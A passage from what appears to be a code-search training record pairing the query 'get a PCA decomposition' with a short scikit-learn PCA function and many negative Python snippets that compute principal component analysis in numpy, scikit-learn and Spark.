response_type='V1beta1Scale',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def get_metric(name):\n return metric_name_to_function_mapping[name.lower()]" ]
[ "0.68367714", "0.63356686", "0.620714", "0.61540365", "0.58169883", "0.57977337", "0.57299215", "0.57015646", "0.56682044", "0.5622776", "0.5611353", "0.55854297", "0.5540283", "0.5517815", "0.5501262", "0.54594105", "0.5455747", "0.5352761", "0.5330781", "0.5323924", "0.53156656", "0.5280825", "0.5212627", "0.52125156", "0.51884276", "0.5158087", "0.5147804", "0.5147335", "0.51376003", "0.5111783", "0.51017237", "0.5067306", "0.50369215", "0.50194913", "0.5013999", "0.5013127", "0.50121886", "0.4998828", "0.49846923", "0.4972591", "0.4960677", "0.49454227", "0.493051", "0.4919574", "0.49182466", "0.4916228", "0.49077487", "0.49058813", "0.49044102", "0.4898452", "0.48939258", "0.48909348", "0.48900187", "0.4877773", "0.48667216", "0.48554873", "0.48458767", "0.48328733", "0.48325127", "0.4819619", "0.4816291", "0.4810047", "0.4809892", "0.48093203", "0.4805093", "0.47964215", "0.47960788", "0.4791131", "0.47889304", "0.47754472", "0.4769216", "0.47662857", "0.4760811", "0.47580218", "0.47565135", "0.4755794", "0.47538766", "0.47523737", "0.4744544", "0.47385955", "0.47368345", "0.47366357", "0.473386", "0.47337875", "0.4726035", "0.47154757", "0.47154546", "0.46994805", "0.46971342", "0.46956566", "0.4691031", "0.4690333", "0.46755153", "0.4669356", "0.466802", "0.4664519", "0.4659965", "0.46589634", "0.46570224", "0.46482933" ]
0.81780565
0
get a PCA decomposition
def get_pca(): from sklearn.decomposition import PCA return PCA()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getPCA(data):\n #covM = np.cov(data.T) #note that np.cov define row as variables, col as observations\n #corM = np.corrcoef(data.T) # we will use correlation matrix instead of cov.\n covM = np.cov(data.T)\n eigvalue,eigvector = np.linalg.eig(covM) # each col of the eigvector matrix corresponds to one eigenvalue. So, each col is the coeff of one component\n pca = np.dot(data,eigvector) # each col is one pca, each row is one obs in that pca. \n return eigvalue,eigvector,pca", "def pca(X = Math.array([]), no_dims = 50):\n\n print \"Preprocessing the data using PCA...\"\n (n, d) = X.shape;\n X = X - Math.tile(Math.mean(X, 0), (n, 1));\n (l, M) = Math.linalg.eig(Math.dot(X.T, X));\n Y = Math.dot(X, M[:,0:no_dims]);\n return Y;", "def pca_decomposition(data, dept, n_components=12):\n try:\n df_svd = pivot_df(data, dept)\n pca = PCA(n_components=n_components)\n df_low = pca.fit_transform(df_svd)\n df_inverse = pca.inverse_transform(df_low)\n\n # re-frame\n df_inverse = reframe_df(previous_df=df_svd, processed_data=df_inverse)\n return df_inverse\n\n except:\n # if pca fail,\n return pivot_df(data, dept)", "def pca(self):\n return DataFramePCA(self.subset_)", "def pca():\n pca = PCA()\n\n data = pca.fit_transform([[22,23,24],[23,84,12],[22,74,54],[22,23,24],[22,84,12],[22,74,54],[22,23,24],[22,84,12],[22,74,54]])\n\n print(data)", "def pca(X, ndim):\n X_m = X - np.mean(X, axis=0)\n u, s, vh = np.linalg.svd(X_m)\n # traditional notation decomp(A) = U (sigma) VT = (u * s) @ vh\n W = vh[0:ndim].T\n # X_m = X - np.mean(X, axis=0)\n return np.matmul(X_m, W)", "def doPCA(self):\n data = [l.points for l in self.preprocessedLandmarks]\n data.append(data[0])\n\n S = np.cov(np.transpose(data))\n\n eigenvalues, eigenvectors = np.linalg.eig(S)\n sorted_values = np.flip(eigenvalues.argsort(), 0)[:self.pcaComponents]\n\n self.eigenvalues = eigenvalues[sorted_values]\n self.eigenvectors = eigenvectors[:, sorted_values]\n # print(self.eigenvalues)\n return self", "def pca(self, X):\n return ImgCompression.svd(self, X)", "def get3dPCA(data):\n\n return PCA(n_components = 3).fit_transform(data)", "def apply_PCA(data, ncomp):\n import sklearn.decomposition as dc\n \n pca = dc.PCA(n_components=ncomp, whiten=False, svd_solver='full')\n cps = pca.fit_transform(data)\n svl = pca.singular_values_\n return cps,pca,svl", "def pca(features, components=6):\n pca = PCA(n_components=components)\n transformed = pca.fit(features).transform(features)\n scaler = MinMaxScaler(feature_range=(0, 1))\n scaler.fit(transformed)\n return scaler.transform(transformed), pca, scaler", "def pca_2(emb) :\n pcaer = skd.PCA(n_components=2)\n pca = pcaer.fit_transform(emb)\n \n return pca", "def PCA(X, k):\n cov = np.matmul(np.matrix.transpose(X), X)\n w, v = np.linalg.eig(cov)\n k_largest = np.argsort(w)[::-1][:k]\n v = np.matrix.transpose(v)\n U = v[k_largest]\n S = w[k_largest]\n return U, S", "def pca(data):\n mean = data.sum(axis=0) / data.shape[0]\n # show_image(mean)\n cv_matrix = np.cov(data.T)\n e_values, e_vectors = la.eig(cv_matrix)\n return e_values, e_vectors.T, mean", "def pca(self):\n self.pca_mean = self.X.mean(axis=1)\n X_meanC = self.X - self.pca_mean[:, None]\n (self.pca_U, self.pca_S, self.pca_V) = np.linalg.svd(X_meanC, full_matrices=False)\n self.pc_weights = np.dot(np.diag(self.pca_S), self.pca_V)\n self.pc_stdevs = np.std(self.pc_weights, axis=1)", "def PCA(X, dims_rescaled_data=21):\n # pca = decomposition.PCA(n_components=3)\n # x_std = StandardScaler().fit_transform(X)\n # a = pca.fit_transform(x_std)\n\n R = 
np.cov(X, rowvar=False)\n evals, evecs = scipy.linalg.eigh(R)\n idx = np.argsort(evals)[::-1]\n evecs = evecs[:,idx]\n\n evals = evals[idx]\n evecs = evecs[:, :dims_rescaled_data]\n\n newX = np.dot(evecs.T, X.T).T\n\n return newX #, evals, evecs", "def PCA(data, n=2):\n U, S, Vt = np.linalg.svd(data, full_matrices=False)\n s = np.diag(S)\n newdata = np.dot(U[:, :n], np.dot(s[:n, :n], Vt[:n,:]))\n return newdata", "def do_pca(x_data, n_class):\n\n run_pca = decomposition.PCA(n_components = n_class)\n pca_fit = run_pca.fit(x_data)\n #pca_fit\n x_pca = run_pca.transform(x_data);\n #pca_cov = run_pca.get_covariance(x_pca)\n #pca_score = run_pca.score(x_data)\n pca_noise = pca_fit.noise_variance_\n pca_var_explained = pca_fit.explained_variance_ratio_\n\n return x_pca, pca_noise, pca_var_explained", "def pca(data, components):\n\n\t_pca = PCA(n_components = components)\n\t_pca.fit(data)\n\tvar = _pca.explained_variance_ratio_\n\tcum_var = np.cumsum(np.round(var, decimals=4)*100)\n\tfig = plt.plot(cum_var)\n\trotation = pd.DataFrame(\n\t\t_pca.components_,\n\t\tcolumns = data.columns,\n\t\tindex = ['PC-1','PC-2','PC-3','PC-4','PC-5','PC-6','PC-7','PC-8','PC-9',]\n\t\t)\n\n\treturn (fig, rotation)", "def princomp(A):\n # computing eigenvalues and eigenvectors of covariance matrix\n M = (A-np.mean(A.T,axis=1)).T # subtract the mean (along columns)\n [latent,coeff] = np.linalg.eig(np.cov(M)) # attention:not always sorted\n score = np.dot(coeff.T,M) # projection of the data in the new space\n return coeff,score,latent", "def pca(x):\n\t\n\tx = (x - x.mean(axis = 0)) # Subtract the mean of column i from column i, in order to center the matrix.\n\t\n\tnum_observations, num_dimensions = x.shape\n\t\n\t# Often, we have a large number of dimensions (say, 10,000) but a relatively small number of observations (say, 75). In this case, instead of directly computing the eigenvectors of x^T x (a 10,000 x 10,000 matrix), it's more efficient to compute the eigenvectors of x x^T and translate these into the eigenvectors of x^T x by using the transpose trick. \n\t# The transpose trick says that if v is an eigenvector of M^T M, then Mv is an eigenvector of MM^T.\n\t# We arbitrarily select \"100\" as the switching threshold. 
Another approach is to switch by comparing num_observations and num_dimensions.\n\tif num_dimensions > 100:\n\t\teigenvalues, eigenvectors = linalg.eigh(dot(x, x.T))\n\t\tv = (dot(x.T, eigenvectors).T)[::-1] # Unscaled, but the relative order is still correct.\n\t\ts = sqrt(eigenvalues)[::-1] # Unscaled, but the relative order is still correct.\n\telse:\n\t\tu, s, v = linalg.svd(x, full_matrices = False)\n\t\t\n\treturn v, s", "def doPCA(pairs, embedding, num_components=10):\n matrix = []\n for a, b in pairs:\n center = (embedding.v(a) + embedding.v(b)) / 2\n matrix.append(embedding.v(a) - center)\n matrix.append(embedding.v(b) - center)\n matrix = np.array(matrix)\n pca = PCA(n_components=num_components)\n pca.fit(matrix)\n # bar(range(num_components), pca.explained_variance_ratio_)\n return pca", "def _apply_pca(self, X):\n newX = np.reshape(X, (-1, X.shape[2]))\n pca = sklearnPCA(n_components=self.num_components, whiten=True)\n newX = pca.fit_transform(newX)\n newX = np.reshape(newX, (X.shape[0], X.shape[1], self.num_components))\n return newX", "def kernelpca(X, n_comp):\n estimator = decomposition.KernelPCA(n_components = n_comp, kernel = 'rbf')\n estimator.fit(X)\n X_proj = estimator.transform(X)\n return estimator.components_, X_proj,", "def principle_component_analysis(data_frame, dim=2):\n pca = PCA(n_components=dim)\n sc = StandardScaler()\n y = data_frame.loc[:, [\"Label\"]].values\n x = pd.DataFrame(data_frame[\"Vector\"].tolist())\n x = sc.fit_transform(x)\n principlecomponents = pca.fit_transform(x)\n principalDf = pd.DataFrame(data=principlecomponents)\n data_frame[\"Vector\"] = principalDf.values.tolist()", "def pca_algorithm(self):\n if self.rotation_algo == 'randomized':\n return PCA(svd_solver='randomized', random_state=self.random_state)\n elif self.rotation_algo == 'pca':\n return PCA()\n else:\n raise ValueError(\"`rotation_algo` must be either \"\n \"'pca' or 'randomized'.\")", "def pca_algorithm(self):\n if self.rotation_algo == 'randomized':\n return PCA(svd_solver='randomized', random_state=self.random_state)\n elif self.rotation_algo == 'pca':\n return PCA()\n else:\n raise ValueError(\"`rotation_algo` must be either \"\n \"'pca' or 'randomized'.\")", "def performPCA(dataSet, numShapesInDataset, numPointsInShapes, num_components):\n\tdataMat = np.array(dataSet).reshape((numShapesInDataset, numPointsInShapes*2))\n\t\n\t\"\"\"Creating the covariance matrix\"\"\"\n\tcovarMat = np.cov(dataMat.T)\n\t\t\n\t\"\"\"Generating the eigen vectors and eigen values\"\"\"\n\teigVals, eigVecs = np.linalg.eig(covarMat)\n\n\t\"\"\"Taking the first num_components eigen vectors and values, and the center of the space.\"\"\"\n\tprincipleComponents = np.real(eigVecs[:, 0:num_components])\n\tprincipleValues = np.real(eigVals[0:num_components])\n\tmeanShape = dataMat.mean(0).reshape((numPointsInShapes * 2, 1))\n\treturn principleComponents, principleValues, meanShape", "def getPCA(matrix):\n eVal, eVec = np.linalg.eigh(matrix)\n indices = eVal.argsort()[::-1] # arguments for sorting eVal desc\n eVal, eVec = eVal[indices], eVec[:, indices]\n eVal = np.diagflat(eVal)\n return eVal, eVec", "def PCA (numpy_cloud ):\r\n\r\n # abort, if there are no points\r\n if (numpy_cloud.shape[0] == 0):\r\n #print (\"In normals.py, in PCA: The input array is empty. 
Returning a null vector and high sigma\")\r\n return np.array ((0, 0, 0)), 1.0, np.array ((0, 0, 0))\r\n\r\n # we only need three colums [X, Y, Z, I] -> [X, Y, Z]\r\n numpy_cloud = numpy_cloud[:, :3].copy () # copying takes roughly 0.000558 seconds per 1000 points\r\n cloud_size = numpy_cloud.shape[0]\r\n\r\n # get covariance matrix\r\n a_transposed_a, mass_center = build_covariance_matrix (numpy_cloud )\r\n\r\n # get normal vector and smallest eigenvalue\r\n normal_vector, smallest_eigenvalue = eigenvalue_decomposition (a_transposed_a )\r\n\r\n # the noise is based on the smallest eigenvalue and normalized by number of points in cloud\r\n noise = smallest_eigenvalue\r\n if (cloud_size <= 3 or noise < 1 * 10 ** -10):\r\n sigma = noise # no noise with 3 points\r\n else:\r\n sigma = sqrt(noise/(cloud_size - 3) )\r\n\r\n return normal_vector, sigma, mass_center", "def princomp(A):\n # computing eigenvalues and eigenvectors of covariance matrix\n # subtract the mean (along columns)\n M = (A-mean(A.T,axis=1)).T\n # attention:not always sorted\n [latent,coeff] = linalg.eig(cov(M))\n\n # projection of the data in the new space\n score = dot(coeff.T,M)\n return coeff,score,latent", "def pca(X: np.array, k: int) -> np.array:\n n, d = X.shape\n X = X - np.mean(X, 0) # mean value of each dimension\n C = np.dot(np.transpose(X), X) # covariance matrix\n if not PCA._check_real_symmetric(C):\n raise ArithmeticError('Covariance matrix is not real symmetric')\n eig_val, eig_vec = np.linalg.eig(C) # eigenvalue, eigenvector\n eig_pairs = [(np.abs(eig_val[i]), eig_vec[:, i]) for i in range(d)] # eigen-value-vector tuples\n topk_pairs = heapq.nlargest(k, eig_pairs) # retrieve top-k eigenvalue pairs\n P = np.array([pair[1] for pair in topk_pairs]) # permutation matrix\n return np.dot(np.real(P), np.transpose(X)).T", "def performpca(df, nb_pc=5):\n # Remove uncomplete series\n print(df.shape)\n normalized=(df-df.mean())/df.std()\n # normalized.plot()\n # plt.show()\n pca = PCA(nb_pc)\n pca.fit(normalized)\n return pca, normalized", "def pca_transform(X, n_components=None):\n return PCA(n_components=n_components).fit_transform(X)", "def pca(X, k = 30):\n \n # Center/scale the data.\n s = np.std(X, axis=0)\n s = np.where(s==0, 1, s)\n X = (X - np.mean(X, axis=0))/s\n \n # Run PCA with sklearn.\n pca_ = PCA(n_components=k)\n return pca_.fit_transform(X)", "def pca(X, ndim):\n\n Xmean = X - np.mean(X, axis=0)\n _, _, vh = np.linalg.svd(Xmean)\n W = vh[:ndim].T\n T = np.matmul(Xmean, W)\n\n return T", "def do_pca(X, y, components: int = 2, plot: bool = True):\n\n new_X = []\n for i in X:\n new_X.append(i.flatten())\n\n X = new_X\n\n # PCA Stuff?\n pca = PCA(n_components=components)\n pca.fit(X)\n\n # Transform input data based on eigenvectors\n X = pca.transform(X)\n\n # Get scatters\n x = [i[0] for i in X]\n w = [i[1] for i in X]\n\n # plot\n\n plt.scatter(x, w, c=y)\n plt.show()", "def apply_pca(X: numpy.ndarray, pca: sklearn.decomposition.PCA):\n output = pca.transform(X)\n return output", "def pca(filename, class_col, sample):\n\n\tX = ml.read_file( filename )\n\n\t# Remove the class label from the dataset so that it doesn't prevent us from training a classifier in the future\n\tif class_col != None:\n\t\ttry:\n\t\t\tclassifier = ml.pd.DataFrame(X.iloc[:, class_col])\n\t\texcept:\n\t\t\tml.sys.exit('Class column out of range.')\n\t\tm = X.shape[1]\n\t\tkeepers = list(range(m))\n\t\tkeepers.pop( class_col )\n\n\t# Determine whether sample is present\n\tX_input = X.iloc[:, keepers]\n\n\t# # Visualize raw 
data\n\tml.plt.figure()\n\tml.sns.scatterplot(data = X, x = X_input['Petal Length (cm)'], y = X_input['Petal Width (cm)'], color = 'k', alpha = 0.5).set(title = filename + ' raw')\n\n\t# Normalize features by Z-score (so that features' units don't dominate PCs), and apply PCA\n\tX_norm, X_mean, X_std = ml.z_norm(X_input)\n\tY, P, e_scaled = ml.pca_cov( X_norm )\n\n\t# Visualize 2D PC data\n\tml.plt.figure()\n\tml.sns.scatterplot(data = Y, x = Y.iloc[:, 0], y = Y.iloc[:, 1], alpha=0.5, color = 'k').set(title = 'PC 2D Projection')\n\n\t# Visualize PCs with heatmap and cree plot\n\tinfo_retention = ml.scree_plot( e_scaled )\n\tml.pc_heatmap( P, info_retention )\n\n\t# Reconstruct data\n\treconstruct(X_input, X_mean, X_std, Y, P, e_scaled, 2, 3)\n\n\tml.plt.show()", "def pca(X, k):\n n, dim = X.shape\n\n # Center the data\n X_mean = np.mean(X, axis = 0)\n X = X - X_mean\n # Get the covariance matrix\n covariance_matrix = np.dot(X.T, X) / (n - 1)\n eigval, eigvec = eigs(covariance_matrix, k)\n return np.array(eigvec), np.array(eigval)", "def pca(image):\n # Reshape image.\n reshaped_image = np.reshape(image, (224 * 224, 3))\n # Find the covariance.\n cov = np.cov(reshaped_image, rowvar=0)\n # Eigenvalues and vectors.\n eigvals, eigvecs = np.linalg.eigh(cov)\n\n # Pick random gaussian values.\n a = np.random.normal(0, 0.1, size=(3,))\n\n scaled = eigvals * a\n delta = np.dot(eigvecs, scaled.T)\n return np.add(delta, scaled)", "def emulator(pca, gp_model, params):\n # Weights prediction\n pred_weights = gp_predict(gp_model, params)\n\n # Inverse PCA (pred_weights * basis + mean)\n reconstructed = pca.inverse_transform(pred_weights)\n return reconstructed", "def _create_PCA(self, mesh_dataset):\r\n N, V, dims = mesh_dataset.shape\r\n\r\n assert dims == 3, \"vertice dims is not 3.\"\r\n\r\n mesh_data = mesh_flatten(mesh_dataset.astype(np.float64))\r\n pca = None \r\n if hasattr(self, \"n_component\"):\r\n pca = PCA(self.n_component)\r\n \r\n print(self.n_component)\r\n unflat_function = f.partial(mesh_unflatten, vertice_size=V)\r\n print(mesh_data.shape)\r\n print(mesh_data)\r\n # pca.fit(mesh_data)\r\n pca = pca.fit(mesh_data.T)\r\n\r\n return pca, unflat_function", "def pca(X_train, X_test, n):\n\n print \"Extracting %d principle components from %d features\" % \\\n (n, X_train.shape[1])\n t0 = time()\n pca = RandomizedPCA(n_components=n, whiten=True, random_state=47).fit(X_train)\n print \"done in %0.3fs\" % (time() - t0)\n \n print \"Transforming the input data\"\n t0 = time()\n X_train_pca = pca.transform(X_train)\n X_test_pca = pca.transform(X_test)\n print \"done in %0.3fs\" % (time() - t0)\n\n return X_train_pca, X_test_pca", "def compute_pca(image_set):\n\n # Check for valid input\n assert(image_set[0].dtype == np.uint8)\n\n # Reshape data into single array\n reshaped_data = np.concatenate([image\n for pixels in image_set for image in\n pixels])\n\n # Convert to float and normalize the data between [0, 1]\n reshaped_data = (reshaped_data / 255.0).astype(np.float32)\n\n # Calculate covariance, eigenvalues, and eigenvectors\n # np.cov calculates covariance around the mean, so no need to shift the\n # data\n covariance = np.cov(reshaped_data.T)\n e_vals, e_vecs = np.linalg.eigh(covariance)\n\n # svd can also be used instead\n # U, S, V = np.linalg.svd(mean_data)\n\n pca = np.sqrt(e_vals) * e_vecs\n\n return pca", "def generate_pca(X, y, cols, n_components, **kwargs):\n\n pca = PCA(n_components, **kwargs)\n pca_result = pca.fit_transform(X)\n pca_df = pd.DataFrame(pca_result, columns=cols, 
index=X.index)\n pca_df['label'] = y\n pca_plot = ggplot(pca_df, aes(x=\"PCA-1\", y=\"PCA-2\", color='label') ) + geom_point(size=100,alpha=0.8) + ggtitle(\"First and Second Principal Components colored by class\")\n return pca_plot", "def pca(self):\n if not self._initialised and not self.cache_valid:\n msg = \"No reference images added or previously computed PCA basis loaded\"\n raise RuntimeError(msg)\n if not self.cache_valid:\n self.pca_results = self._pca()\n self.cache_valid = True\n return self.pca_results", "def pca(frame,columns=[],k=320,frame_type='spark'):\n if frame_type == 'spark':\n # https://stackoverflow.com/questions/33428589/pyspark-and-pca-how-can-i-extract-the-eigenvectors-of-this-pca-how-can-i-calcu/33481471\n from numpy.linalg import eigh\n from pyspark.ml.linalg import Vectors\n from pyspark.ml.feature import VectorAssembler\n from pyspark.ml.feature import StandardScaler\n from pyspark.ml import Pipeline\n\n assembler = VectorAssembler(\n inputCols=columns,\n outputCol=\"features\")\n scaler = StandardScaler(inputCol=assembler.getOutputCol(),\n outputCol=\"scaledFeatures\",\n withStd=False,\n withMean=True)\n pipeline = Pipeline(stages=[assembler,scaler])\n model = pipeline.fit(frame)\n df = model.transform(frame)\n\n def estimateCovariance(df):\n \"\"\"Compute the covariance matrix for a given dataframe.\n\n Note:\n The multi-dimensional covariance array should be calculated using outer products. Don't\n forget to normalize the data by first subtracting the mean.\n\n Args:\n df: A Spark dataframe with a column named 'features', which (column) consists of DenseVectors.\n\n Returns:\n np.ndarray: A multi-dimensional array where the number of rows and columns both equal the\n length of the arrays in the input dataframe.\n \"\"\"\n import numpy as np\n m = df.select(df['scaledFeatures']).map(lambda x: x[0]).mean()\n dfZeroMean = df.select(df['scaledFeatures']).map(lambda x: x[0]).map(lambda x: x-m) # subtract the mean\n\n return dfZeroMean.map(lambda x: np.outer(x,x)).sum()/df.count()\n\n cov = estimateCovariance(df)\n col = cov.shape[1]\n eigVals, eigVecs = eigh(cov)\n inds = np.argsort(eigVals)\n eigVecs = eigVecs.T[inds[-1:-(col+1):-1]]\n components = eigVecs[0:k]\n eigVals = eigVals[inds[-1:-(col+1):-1]] # sort eigenvals\n score = df.select(df['scaledFeatures']).map(lambda x: x[0]).map(lambda x: np.dot(x, components.T) )\n\n #Show the Variance explained\n print('Vairance Explained:', sum(eigVals[0:k])/sum(eigVals) )\n\n # Return the `k` principal components, `k` scores, and all eigenvalues\n return components.T, score, eigVals\n elif frame_type in ['h2o','pandas']:\n raise Exception('Not Implemented yet.')", "def PCA_vis(select_PCA_features, player_attributes):\n x = player_attributes.loc[:, select_PCA_features].values\n\n # Standardizing the features\n x = StandardScaler().fit_transform(x)\n\n # perform 3 component PCA\n pca = PCA(n_components=3)\n principalComponents = pca.fit_transform(x)\n principalDf = pd.DataFrame(\n data=principalComponents,\n columns=[\n \"principal component 1\",\n \"principal component 2\",\n \"principal component 3\",\n ],\n )\n\n # plot players dataset projection on three principal components\n # %matplotlib notebook\n\n fig = plt.figure(figsize=(8, 8))\n ax = fig.add_subplot(1, 1, 1, projection=\"3d\")\n ax.set_title(\"3 component PCA\", fontsize=30)\n\n # plot first k players' info along principal components\n k = 4000\n ax.scatter(\n principalDf.loc[:k, \"principal component 1\"],\n principalDf.loc[:k, \"principal component 2\"],\n 
principalDf.loc[:k, \"principal component 3\"],\n s=1,\n )\n\n ax.set_xlabel(\"Principal Component 1\", fontsize=15)\n ax.set_ylabel(\"Principal Component 2\", fontsize=15)\n ax.set_zlabel(\"Principal Component 3\", fontsize=15)\n plt.show()\n\n return principalDf", "def get_pca_data(dataframe):\n # We don't reduce dimensionality, but overlay the 2 principal components in 2D.\n pca = PCA(n_components=2)\n \n x = dataframe[['df1', 'df2']].values\n try:\n # df1 and df2 have the same scale. No need to standardize. Standardizing might actually distort PCA here.\n pca.fit(x)\n except ValueError:\n # Return empty.\n df = pd.DataFrame(columns=['var_expl', 'var_expl_ratio', 'x', 'y', 'meanx', 'meany'])\n else:\n df = pd.DataFrame({'var_expl': pca.explained_variance_.T,\n 'var_expl_ratio': pca.explained_variance_ratio_.T * 100, # In percent\n 'x': pca.components_[:, 0],\n 'y': pca.components_[:, 1],\n 'meanx': pca.mean_[0],\n 'meany': pca.mean_[1],\n },\n index=[1, 2] # For designating principal components.\n )\n df.index.rename('PC', inplace=True)\n return df", "def pca(adata, n_components=50, train_ratio=0.35, n_batches=50, gpu=False):\n\n train_size = math.ceil(adata.X.shape[0] * train_ratio)\n\n if gpu:\n from cuml.decomposition import PCA\n import cupy as cp\n else:\n from sklearn.decomposition import PCA\n import numpy as cp\n\n pca = PCA(n_components=n_components).fit(adata.X[:train_size])\n \n embeddings = cp.zeros((adata.X.shape[0], n_components))\n batch_size = int(embeddings.shape[0] / n_batches)\n for batch in range(n_batches):\n start_idx = batch * batch_size\n end_idx = start_idx + batch_size\n\n if(adata.X.shape[0] - end_idx < batch_size):\n end_idx = adata.X.shape[0]\n\n embeddings[start_idx:end_idx,:] = cp.asarray(pca.transform(adata.X[start_idx:end_idx]))\n \n if gpu:\n embeddings = embeddings.get()\n\n adata.obsm[\"X_pca\"] = embeddings\n return adata", "def pca_reduction(X, ncomp=20):\n print('Performing dimensionality reduction ...')\n\n # PCA fitting\n pca = PCA(n_components=ncomp)\n weights = pca.fit_transform(X)\n basis = pca.components_\n\n # # Plot cumsum(explained_variance) versus component\n # plt.semilogy(pca.explained_variance_ratio_*100, 's')\n # plt.ylabel('Explained Variance Ratio (%)', size=20)\n # plt.xticks(size=20)\n # plt.xlabel('Component', size=20)\n # plt.yticks(size=20)\n # plt.show()\n\n print('Explained variance ratio : '+str(round(np.cumsum(pca.explained_variance_ratio_)[-1]*100, 2))+' %.')\n\n # pickle.dump(pca, '/../Data/GPmodel/pca_'+str(ncomp))\n\n # Some plots on PCA\n # plot_pca(basis, weights)\n\n return pca, weights", "def pca(points: np.ndarray, axis: Optional[Any] = None) -> np.ndarray:\n\n # Perform PCA to understand what the primary axis\n # of the given point set is\n mean = np.mean(points, axis=0)\n # Points have to be zero-mean\n centered = points - mean\n # np.linalg.eig takes a covariance matrix as an argument\n cov = np.cov(centered.T)\n # Call eigenvector decomposition to obtain principal components\n eigenval, eigenvec = np.linalg.eig(cov)\n # We want to parametrize target straight line\n # in the coordinate frame given by the eigenvector\n # that corresponds to the biggest eigenvalue\n argmax_eigen = np.argmax(eigenval)\n # We'll need projections of data points\n # on the primary axis\n loc_pca = np.dot(centered, eigenvec)\n loc_maxeigen = loc_pca[:, argmax_eigen]\n max_eigenval = eigenval[argmax_eigen]\n max_eigenvec = eigenvec[:, argmax_eigen]\n # Re-parametrize the line\n loc_start = mean + max_eigenvec * loc_maxeigen[0]\n 
loc_final = mean + max_eigenvec * loc_maxeigen[-1]\n linspace = np.linspace(0, 1, num=len(points))\n positions = loc_start + np.outer(linspace, loc_final - loc_start)\n\n if axis is not None:\n for ax in axis:\n ax.set_title(\"PCA\")\n ax.plot(points[:, 0], points[:, 1], 'or')\n ax.plot(positions[:, 0], positions[:, 1], 'o-', mfc='none')\n ax.grid(True, linestyle='--')\n ax.axis('equal')\n\n return positions", "def get_features_from_pca(feat_num, feature):\n\n if feature == 'HoG':\n vocab = np.load('vocab_hog.npy')\n elif feature == 'SIFT':\n vocab = np.load('vocab_sift.npy')\n\n # Your code here. You should also change the return value.\n\n def _get_PCA_vectors(feat_num, vocab):\n\n mean = vocab.mean(axis=0, keepdims=True)\n vocab_normalized = vocab - np.multiply(np.ones([vocab.shape[0], mean.shape[0]]),\n mean)\n #TEST: mean unit test\n #mean = vocab_normalized.mean(axis=0, keepdims=True)\n\n cov_matrix = np.cov(np.transpose(vocab_normalized))\n sigma, V = np.linalg.eig(cov_matrix)\n order_sigma = np.argsort(sigma)\n\n PCA_vectors = []\n i = 1\n for f in range(len(order_sigma)):\n eigen_vector = V[:, order_sigma[i]]\n if all(True for _ in np.isreal(eigen_vector)):\n PCA_vectors.append(np.real(eigen_vector))\n i += 1\n if len(PCA_vectors) == feat_num:\n break\n\n return np.array(PCA_vectors)\n\n #MAIN\n PCA_vectors = _get_PCA_vectors(feat_num, vocab)\n\n d = np.dot(vocab, np.transpose(PCA_vectors))\n\n return np.dot(vocab, np.transpose(PCA_vectors))\n #return np.zeros((vocab.shape[0],2))", "def pca(\n data: AnnData,\n n_components: int = 50,\n features: str = \"highly_variable_features\",\n standardize: bool = True,\n max_value: float = 10,\n random_state: int = 0,\n) -> None:\n\n keyword = select_features(data, features)\n\n start = time.time()\n\n X = data.uns[keyword]\n\n if standardize:\n # scaler = StandardScaler(copy=False)\n # scaler.fit_transform(X)\n m1 = X.mean(axis=0)\n psum = np.multiply(X, X).sum(axis=0)\n std = ((psum - X.shape[0] * (m1 ** 2)) / (X.shape[0] - 1.0)) ** 0.5\n std[std == 0] = 1\n X -= m1\n X /= std\n\n if max_value is not None:\n X[X > max_value] = max_value\n X[X < -max_value] = -max_value\n\n pca = PCA(n_components=n_components, random_state=random_state)\n X_pca = pca.fit_transform(X)\n\n data.obsm[\"X_pca\"] = X_pca\n data.uns[\n \"PCs\"\n ] = pca.components_.T # cannot be varm because numbers of features are not the same\n data.uns[\"pca\"] = {}\n data.uns[\"pca\"][\"variance\"] = pca.explained_variance_\n data.uns[\"pca\"][\"variance_ratio\"] = pca.explained_variance_ratio_\n\n end = time.time()\n logger.info(\"PCA is done. 
Time spent = {:.2f}s.\".format(end - start))", "def feature_cPCA(wv, n_components=12, incremental=False, batch_size=None):\n if incremental:\n raise NotImplementedError(\"Can't run incremental PCA yet.\")\n\n ers = np.reshape(np.transpose(wv, axes=(1, 0, 2)), (N_SAMPLES * N_CHANNELS, -1))\n pca = PCA(n_components)\n scores = pca.fit_transform(ers.T)\n return scores", "def doPCA(df, grouping_variable, features_to_analyse, plot_save_dir=None, PCs_to_keep=10):\n \n data = df[features_to_analyse]\n \n # Normalise the data before PCA\n zscores = data.apply(zscore, axis=0)\n \n # Drop features with NaN values after normalising\n colnames_before = list(zscores.columns)\n zscores.dropna(axis=1, inplace=True)\n colnames_after = list(zscores.columns)\n nan_cols = [col for col in colnames_before if col not in colnames_after]\n if len(nan_cols) > 0:\n print(\"Dropped %d features with NaN values after normalization:\\n%s\" %\\\n (len(nan_cols), nan_cols))\n\n print(\"\\nPerforming Principal Components Analysis (PCA)...\")\n \n # Fit the PCA model with the normalised data\n pca = PCA()\n pca.fit(zscores)\n \n # Project data (zscores) onto PCs\n projected = pca.transform(zscores) # A matrix is produced\n # NB: Could also have used pca.fit_transform()\n\n # Plot summary data from PCA: explained variance (most important features)\n important_feats, fig = pcainfo(pca, zscores, PC=1, n_feats2print=10) \n \n if plot_save_dir:\n # Save plot of PCA explained variance\n PCAplotroot = Path(plot_save_dir) / 'PCA'\n PCAplotroot.mkdir(exist_ok=True, parents=True)\n PCAplotpath = PCAplotroot / ('control_variation_in_' + \n grouping_variable + \n '_PCA_explained.eps')\n savefig(PCAplotpath, tight_layout=True, tellme=True, saveFormat='eps')\n plt.pause(2); plt.close()\n else:\n PCAplotpath=None\n plt.show(); plt.pause(2); plt.close()\n \n # Store the results for first few PCs in dataframe\n projected_df = pd.DataFrame(projected[:,:PCs_to_keep],\n columns=['PC' + str(n+1) for n in range(PCs_to_keep)]) \n \n # Add concatenate projected PC results to metadata\n projected_df.set_index(df.index, inplace=True) # Do not lose video snippet index position\n \n df = pd.concat([df, projected_df], axis=1)\n\n # Plot PCA - Variation in control data with respect to a given variable (eg. 
